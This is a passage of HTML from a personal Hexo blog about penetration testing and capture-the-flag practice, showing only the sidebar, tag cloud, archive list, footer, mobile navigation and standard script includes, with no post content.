                    <a href=https://www.facebook.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
        </div>
        <div class="sidebar-menu">
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Home</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/archives"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Archives</div>
                </div>
            
        </div>
    </div>
    
        
    <div class="widget-wrap wow fadeInRight">
        <h3 class="widget-title">Categories</h3>
        <div class="widget">
            <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/hack-the-box/">hack the box</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux%E5%AD%A6%E4%B9%A0/">linux学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0/">渗透学习</a></li></ul>
        </div>
    </div>


    
        
    <div class="widget-wrap wow fadeInRight">
        <h3 class="widget-title">Tag Cloud</h3>
        <div class="widget tagcloud">
            <a href="/tags/burp-suite/" style="font-size: 10px;">burp suite</a> <a href="/tags/chown/" style="font-size: 10px;">chown</a> <a href="/tags/find/" style="font-size: 10px;">find</a> <a href="/tags/ftp/" style="font-size: 10px;">ftp</a> <a href="/tags/fuzz/" style="font-size: 12.5px;">fuzz</a> <a href="/tags/gittools/" style="font-size: 10px;">gittools</a> <a href="/tags/hackmyvm/" style="font-size: 20px;">hackmyvm</a> <a href="/tags/hydra/" style="font-size: 10px;">hydra</a> <a href="/tags/linux%E6%8F%90%E6%9D%83/" style="font-size: 10px;">linux提权</a> <a href="/tags/msf/" style="font-size: 12.5px;">msf</a> <a href="/tags/msfs/" style="font-size: 10px;">msfs</a> <a href="/tags/nmap/" style="font-size: 10px;">nmap</a> <a href="/tags/pspy/" style="font-size: 10px;">pspy</a> <a href="/tags/shellinabox/" style="font-size: 10px;">shellinabox</a> <a href="/tags/ssh/" style="font-size: 10px;">ssh</a> <a href="/tags/talnet/" style="font-size: 10px;">talnet</a> <a href="/tags/tryhackme/" style="font-size: 17.5px;">tryhackme</a> <a href="/tags/webshell/" style="font-size: 15px;">webshell</a> <a href="/tags/wp/" style="font-size: 10px;">wp</a> <a href="/tags/%E7%88%86%E7%A0%B4/" style="font-size: 10px;">爆破</a> <a href="/tags/%E7%9B%AE%E5%BD%95%E6%B8%97%E9%80%8F/" style="font-size: 10px;">目录渗透</a> <a href="/tags/%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86/" style="font-size: 12.5px;">目录遍历</a> <a href="/tags/%E8%B7%AF%E5%BE%84%E5%8A%AB%E6%8C%81/" style="font-size: 10px;">路径劫持</a>
        </div>
    </div>


    
        
    <div class="widget-wrap wow fadeInRight">
        <h3 class="widget-title">Archives</h3>
        <div class="widget">
            <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/08/">August 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">July 2023</a></li></ul>
        </div>
    </div>


    
</aside>

                
            </div>
            <footer id="footer" class="wow fadeInUp">
    <div style="width: 100%; overflow: hidden"><div class="footer-line"></div></div>
    <div class="outer">
        <div id="footer-info" class="inner">
            
            <div>
                <span class="icon-copyright"></span>
                2020-2023
                <span class="footer-info-sep"></span>
                honkerZ
            </div>
            
                <div>
                    Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
                    Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
                </div>
            
            
                <div>
                    <span class="icon-brush"></span>
                    27k
                    &nbsp;|&nbsp;
                    <span class="icon-coffee"></span>
                    02:29
                </div>
            
            
                <div>
                    <span class="icon-eye"></span>
                    <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
                    &nbsp;|&nbsp;
                    <span class="icon-user"></span>
                    <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
                </div>
            
        </div>
    </div>
</footer>

        </div>
        <nav id="mobile-nav">
    <div class="sidebar-wrap">
        <div class="sidebar-author">
            <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="honkerZ" class="lazyload">
            <div class="sidebar-author-name">honkerZ</div>
            <div class="sidebar-description">hacking</div>
        </div>
        <div class="sidebar-state">
            <div class="sidebar-state-article">
                <div>Posts</div>
                <div class="sidebar-state-number">18</div>
            </div>
            <div class="sidebar-state-category">
                <div>Categories</div>
                <div class="sidebar-state-number">3</div>
            </div>
            <div class="sidebar-state-tag">
                <div>Tags</div>
                <div class="sidebar-state-number">23</div>
            </div>
        </div>
        <div class="sidebar-social">
            
                <div class=icon-github>
                    <a href=https://github.com/kter123 itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-google>
                    <a href=https://plus.google.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-twitter>
                    <a href=https://twitter.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-facebook>
                    <a href=https://www.facebook.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
        </div>
        <div class="sidebar-menu">
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Home</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/archives"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Archives</div>
                </div>
            
        </div>
    </div>
</nav>

        
<script src="https://unpkg.com/jquery@3.7.0/dist/jquery.min.js"></script>


<script src="https://unpkg.com/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://unpkg.com/clipboard@2.0.11/dist/clipboard.min.js"></script>



    
<script src="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>



    
<script src="https://unpkg.com/busuanzi@2.3.0/bsz.pure.mini.js"></script>






<script src="/js/script.js"></script>
















    </div>
    <div class="site-search">
        <div class="algolia-popup popup">
            <div class="algolia-search">
                <span class="algolia-search-input-icon"></span>
                <div class="algolia-search-input" id="algolia-search-input"></div>
            </div>

            <div class="algolia-results">
                <div id="algolia-stats"></div>
                <div id="algolia-hits"></div>
                <div id="algolia-pagination" class="algolia-pagination"></div>
            </div>

            <span class="popup-btn-close"></span>
        </div>
    </div>
    <!-- hexo injector body_end start -->
<script src="/js/insertHighlight.js"></script>
<!-- hexo injector body_end end --></body>
    </html>

